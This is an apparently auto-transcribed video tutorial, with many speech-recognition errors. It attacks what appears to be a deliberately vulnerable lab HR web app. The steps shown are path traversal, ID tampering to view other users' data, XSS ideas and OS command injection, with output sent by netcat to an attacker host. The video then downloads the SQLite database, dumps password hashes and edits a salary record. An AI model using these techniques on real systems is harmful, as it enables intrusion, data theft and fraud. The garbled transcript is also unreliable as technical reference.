how hackers hack any websites in minutes?!

Today I will show you how you can be as handsome as Mr. Hack Alloy. I'm just kidding. I will teach you how to be a

hack

ing status which is much easier and now before we start kids remember that

hack

ing is illegal. If you get caught hacking there really isn't much I can do to help you, the police will knock on your door, arrest you and the next thing you know you'll never be able to see Mr. Hackaloy again so here's a list of things what they might be doing. today, first of all, you have a website that you're going to go to and you're going to enter the URL of the website here and of course in this case you could say loy liang.com as your target.

Well, I mean, we're not here. for online shopping, the next thing you're going to do here is start pointing to the server using an operating system like color Linux that's loaded with all these different types of hacking tool scripts, etc., so that we can point to the site. In this case, we'll look for potential vulnerabilities on the side, so the vulnerabilities could be, for example, SQL injection that we can target, it could be an operating system command that we can target as part of different parts of the features of the site and the craziest. The thing is, we can even change the information displayed on the site so that you can do just that and the reason we can do that is because behind every website there is a gigantic database of all this different information that could contain a username as passwords as salary information okay that's very juicy and a lot of different data that we can target and now before we start kids this is going to be a pretty long tutorial and you're going to need at least 15 cups of coffee .

I already have 25 cups and Remember that children have great power and carry great responsibility and what you need to do now is turn on notifications, subscribe to the channel so you don't get hacked, so right in front of us we are on the colored links . to be your best friend here and of course your best friend forever your best friend is hacker or Loy and of course the next best friend is called Linux so what I can do now is go ahead and open a browser, so in this case we have to say. Firefox and what you can do now is usually go to the site by entering in the URL, so in my case I can enter the phone point of y2168.0 or 1844 using the forward slash Wheels Gow, so this will be the website we will use. is pointing and of course in other cases you can say loy liangyang.com, the target site, but if it really points to lealangyoung.com, I assure you that I will find your IP address, I will find out everything about your location, your name, your password oh don't worry, I'm just helping you find your password, so right in front of us we are on the login page so we can go ahead and say, for example, log in to the site or at the same time register an account on the site, so either way we are trying to figure out the structure of the application, we have to really understand how the data flows from the browser to the backend system, so in this case I have already created an account so I can go ahead and launch session. here hackaloy at hackaloy.com as you can see here and of course I can enter the password to log in directly and I click on log in that's it so now we log in and of course this looks like an HR system and Of course, we have the 401K, we have PTO available sick days, income is taken, etc., etc., and you'll see on the left side all of these are the different parts or pages of the site that we can go to and Of course, the first thing a professional hacker should do is go through each of these pages to understand the structure of the application from the inside out and understand how the pages work, what the URLs are, so of course , you can see right here, in this case we have something quite interesting.

Ya, if you see here, we have the following from the URL and of course in the URL we have users, we have a number and then we have another page here called benefits forms, so this checks a lot of things because if I had to. create another user with seven become another digit the other thing we're looking for, as you can see here, is that we have health insurance and dental insurance and the ability to upload a file. Now, looking here, we can go ahead and say, click on health insurance and dental insurance and we can see here, okay, we have a PDF document, etc., and we have the following information here again.

We're pointing to the URL, so we have the download question mark name with an equal dot. PDF and write equal file is quite interesting, so this is a possible entry point or injection point for us, in the same way, under denter and so on, not PDF and write equal files again, this is another possible point entry point for us, the reason I say this could be a possible entry point is because if I changed this to dot, dot, slash, dot, slash, dot, slash, could I access another file? interest by simply pointing it to a completely separate file name or path and maybe you're thinking?

Mr. hackaloy, why aren't you doing a brute force attack against the login page now on a website where you would normally have a login page and of course what the

hackers

will do is talk. Point to the login page using all sorts of email addresses that they may have already extracted or collected, as well as the password. See using, let's say, all the different combinations or commonly used passwords, like one, two, three, four, five, six, seven eight, password like passwords, all these are the commonly used passwords, in which you will directly inject them . login field, the downside of this is that it is easily detectable and bypassed at the application or firewall level.

What we need to do then is be more creative in our attack approach and what we will do now is go to the top right corner and configure our Interceptor and in this case we will use burp Suite as our Interceptor to see all the different requests that will be sent to the server of applications, so click on the next. things you want to learn, which is to look like a hacker, you open the terminal right now and you go and enter a burp street. Go on n and now we're opening up our Interceptor, so here we have the community edition of Burp Suite. go ahead and click start burp and what we can do now is go to the proxy tab and secure the intercept so once we have that you can go ahead and click upload file, click add file, so in this case I can go ahead and add a I can upload a normal file, so maybe in this case I can go ahead and select something called Dark Dash or not do hash.txt and we have it here, go ahead and click Start Upload and we're intercepting right now, okay?

Let's go ahead and go back to Burp Street Community Edition so this is a live reload so go ahead and drop this one and right here we have the rose gold reload post so right click on this send to repeater the reason why I am sending through the relay is because I want to understand what is part of the HTTP request that will be sent to the application server, so here we can see the following, so we have the post, so this is the HTTP. method, so we're going to upload things or post them to the destination URL here, which is rose gold upload.

Well, we have the user agent information as part of a browser as soon as possible as a sublanguage content type, so in this case we have multiple parts. form data, okay, so we have the source reference or some eccentric information, so we have the actual fault session, so this is something that you are using as part of your session identity, so your session values ​​what no so it's part of the cookie and as I scroll down we have the insecure update request we have the correct content layout so in this case we have the name utf-8 and we have a tick here possibly to indicate some way of saying that it is a legitimate request. and all that, that could be the case and I have more content disposition authenticity token, okay, that's interesting, this could be data that they will use later, we have a fake backup of benefits, okay, that It is interesting, generally, if a strength value is sent. as part of a parameter, so in that case it's true or false, so what happens if we change this a little bit, so that could be the case and then we have something here called benefit loading.

So in this case, have the file, as well as the file information, right at the bottom, so this is the hackaloy salary dot document and so on, so this was part of another tutorial we did above to accelerate your learning as part of executing all this different. type of checks scans looking for vulnerable openings the idea behind article piracy or piracy as a whole is to find entry points injection points yes they are structure query language expulsion yes operating system command injection the goal is to find a part of the site which is vulnerable, that's the idea of ​​hacking, so in this case what happens if I change this to true?

Here you can see the following benefits of backup, so what you are trying to do is try to copy a file that is uploaded to a backup. directory could that be the case, we don't know because this is a black box testing so we have no idea about the structure of the application and we need to find out first, so in this case if I change this to true, does what will happen? so go ahead and click submit and you can see on the right, okay, you're being redirected, okay, that's interesting, so you're being sent back to the rails, good user, seven profit forms, etc., so that's to be expected, okay. if I were to change this back to the default value of false, I click submit same thing, all good, not many changes seen so there might be some kind of possible instructions either based on the app itself or at the operating system level, so those are things that can possibly be executed as part of the structure of this application and we want to take advantage of that to continue, we can also click on other pages, so in this case we have 401K information to so you can see it one more time in the real estate users URL 7. retirement, okay, so PTO is okay, job information, etc., so possibly one of them could have a vulnerability, which means that if we change this value here we could see something else, so let's say, for example, I change this to six.

I press enter on that and boom we see someone else's data, I enter five oh we see Ken Johnson's data so again there are different parts of the site that could be vulnerable and in some parts of the site they are not and in other parts Yeah. they're vulnerable, so these are all different types of things that you can possibly access to see if you're getting a vulnerable entry point to go to. Okay, so these are all different possibilities that you can use as part of executing your trick below. you have messages on the left so when you click on the messages you can send messages to the different users within the app so this uses your storage in the backend database system, usually if you can send messages, you may be thinking about doing so. something called a cross-size script attack, so this is a point where you can inject your own script and when the user opens the message, it possibly redirects them to hackaloid.com, so those are things that you can do as part of the shipment. take out the message so you can send some scripts along with the message and finally don't miss our ending.

If you go to the top right corner, you can click on our account settings and in the account settings you can also update your personal information, so twice if you go under the foxy proxy and if I'm going to go ahead and enter the first name, I'll say hacker Loy and then I have to pass it to you here, so maybe I enter a password field, resend the password confirmation and I go ahead and click. submit on this one I click submit I go to burp Street or I go to the proxy tab and of course I can go ahead and drop this one.

I would leave the reload live and of course in this case we have seven point Json post users, okay. in this case, you'll see at the bottom that we have the username and password confirmation, all these different details, so if I send to the repeater, in the second repeater tab you can see the different information here that is sent to the backend system. Behind every application server is a database and we also want to find out what type of database they are using. Is it Microsoft SQL? Is it a MySQL database and possibleSQL? Is it lightweight SQL? and all that, so all these different possible databases. which we're targeting as part of the release of the hack now, as far as testing, we really want to understand what are the potential areas or entry points or injection points, so as part of the testing, you have three rental checks against all these different parameters or input fields. and you have found that a file name is susceptible to operating system command injection, so in that case, what we can do here under the file name is you can test them, so in this case, in this situation, I can say LS, okay and then you can have possible connectivity on the

hackers

machine, so in this case we have 118 and on port 4444.

So what this will do is broadcast the LS, which is a list from the files and directories within the current working directory, to our hackers machine, so in this case I can go ahead and configure netcat, so in this situation I can enter the following from ipadvr, so this is the hacker's IP address 182168.0118 and what I can do now is go ahead and enter NC correctly so We're setting up our listener to be set up right now. I can go back to burp suite and what I can see here is that we have ls right followed by netcat at 102 168.0.118.4444, so in this case if I were to go ahead and enter submit, let's see what we get.

I go back to the netcat listener and we can see here we have the following information and there you have it, you have hacked the machine so this is the current running application server directory so in this case we have several interesting directories so here you can see the following possibly the database configuration. These are all different goals that we are looking for because we want to know if we are storing the usernames or the password somewhere, so now with the OS command injection this allowed us to build the structure of the application very cleanly, so what I can do now is I can go ahead and change this a little bit so I want to know what the current working directory is so I'm going to use PWD which is a previous working directory and again I'm going to send information to the hackers machine computing, so what I can do now is go ahead and set up a listener, burp again, so click submit and you can Look, here we have the following from o w ASP bwa rails Goat Dash git and now what I've done here It's just that I have copied the OS command injection results here so that we understand that the application is running in all blue.

ASP bwa real Goods Dash git and of course we're pointing to the DB directory, which could probably represent the database we're really interested in because it could show us some of this information, like usernames, passive views, etc., which They would allow us. To do other things, then we go back to Bread Suite and in this case we want to point and see what's inside the DB folder or directory, so you'll see here, we've changed the operating system command a little bit. else, we cd into the following dbe directory and then do the following with Ls, so what we are doing here now is going to the working directory of the database and then we make a list, so Go ahead and do it now same, so go ahead and configure your listener.

Go back to Burp Suite. Click Submit. Go back to the next. You can see the following dot SQL lite3 development. Okay, we have the schema.rb c-store RV and test. dot sqlite3, so what we want to do now is go ahead and find a way to download that file, so in this situation, if I go back to the Rails code download name the same, what I can do here is try to see if we can. Point to that directory that contains the free dot sqlite development file, so what I can do now is make a dot slash, forward slash, so the reality is we don't know what the current working directory is, but with five of this here that let's go back to the root directory and then we can go ahead and point to the next thing, so if I come back here we have the owasp bwa rose gold dash kit, so I go back to the URL, paste it here and delete this one. and I have a database slash development point with slash sqlite3, so if I go back to review the results here, this is the file we're going to, so I go back to the browser, press enter and now we can save the file .

Alright, let's go ahead and save it and replace the file. I already did this configuration and testing. We managed to download the file due to a vulnerability. Another entry point so we can download information from within. operating system at this point I am very happy to declare that you are no longer a script Kitty now what we are going to do is interrogate or query the file so what I can do now is go and enter SQL lite3 followed by development dot SQL I3 press enter and now we can query the database, so in this case you can enter document tables and we can see the following, so these are all different tables that are inside the application server, so in this case we can see . things like benefits paid time off retirements users the user is pretty interesting messages pay schedules work information so these are all the different tables that we're targeting so in this case we mean interact so you can enter select a star from users press enter and boom this is super cool so we have the next admin on metacarp.com okay we have Jack we have Jim Mike can Loy Leon the young gmail.com hack alloy too like this that these are all different users and probably the second column seems to be some? hashed password type, so we could go back to the rainbow tables where we have this whole list of commonly used passwords that are included in the same hash algorithm and do a reverse lookup and see what we do right to get all these beautiful details . right here Also, you can also enter all right followed by the table in the store information and in this case we can go so that the users press enter and they can see the following columns, so we have the first column as ID, the second one is send an email to the third party as password and administrator, okay that's interesting, whether the user is an administrator or not, it is true or false, it's pretty simple and then we got a user ID, so the user ID user that you can see here is being added incrementally so that you have one. two three four five six and seven so all of these are added incrementally and finally we have the shutdown token so this is again another interesting piece of information that we can possibly use like for example trying to hijack another uses session now before to continue.

You may be thinking why I directly choose a reverse shell, especially now that I have the ability to execute operating system commands, so before we continue, what exactly are reverse shells? Here you have the destination server on the left and, of course, on the right. you have Mr hackaloy and what you can do now is automatically execute an OS command injection or an OS command and send it to connect to Mr hackaloy's machine and then we can remotely control the entire computer, without Regardless the reason I can't do that in this tutorial is because there is some kind of sanitization of the application entry or some kind of possible firewall that is operating protecting the system from the application, so what is happening here, As you can see, it's right in the middle, which appears to have a firewall and the firewall or possibly sometimes also integrated within the application layer is that it's filtering out some of these common type of special characters like slash, single quotes, like double quotes and possibly semicolons as well, so these are all different types of Smash characters. that can be removed entirely, as part of protecting the application against all of these different types of attacks.

Now, going back to analysis, what you want to do is is there a way for us to update our salary information? That's pretty interesting, so I can do it. Let's say select star from the following working underscore fillers, press Enter and we can see the following, so we have the correct user ID of seven and now we are with sixty thousand dollars, so is there a way to change this using a million so the answer is yes and we need a combination of several things so for this trick to work the first thing we need to do is load a file containing some instructions and number two is then run it. file that will then provide information for the execution, so that would be what we're going to do here, so what I can do now is I can go ahead and enter the following, so we have the CD in the database and what I want to do. now it's because remember it's escaping the single quilt, it's escaping the forward slashes and the backslashes, so we're very limited in what we can do, so what we have here is the final payload, so we do it.

What we do now is we look at the or we change the directory to the database and we echo and in this case we are doing an update job in its entirety, we set the revenue to 100,000 where the user ID is equal to seven and we do a semicolon to end the sqlite command, which one is it? again, in this case, a structured query language command, of course, in that case, where we have the single code, this allows us to finalize whatever we want to echo here, save it to a file inside the DB directory and then we put a hexer, which is to comment out the rest of the OS command, so it's super clean, super neat, super smart and once you're done, go ahead and click Submit and that's it, the file is now created in the base of back-end data.

You can easily do a check on that, so what can you do? If you want to check this you can check cddb again and do ls -l and followed by the following of netcat 192.168.0.118 and then say 0.4444 correctly so this again allows us to send that information is due to OS command injection which we discover as an entry point, so I can do NC, okay nlvp444 press enter on that, go back to burp Suite, go ahead and click Submit on this and see what we get as a result, so if I come back here and I can see here that we have autumn and it has been updated according to the most current weather.

Okay, if I do a, of course, you can also do a cat in the fall and be able to get that information. So what we want to do now is go back to Burp Street and run the update, so this is the final payload, so we have to change the directory to the database directory again and we have SQL Lite 3 development.sqlite3 and then of course we run the following instructions on the file which are to update the job information so that the hacker act gets a better salary and of course we have the hex at the end that comes out of the rest of the command of the operating system once it is ready. to click send boom I go back to the browser, I click on job information and here we have an income of a hundred thousand dollars, so thank you for giving me a better salary.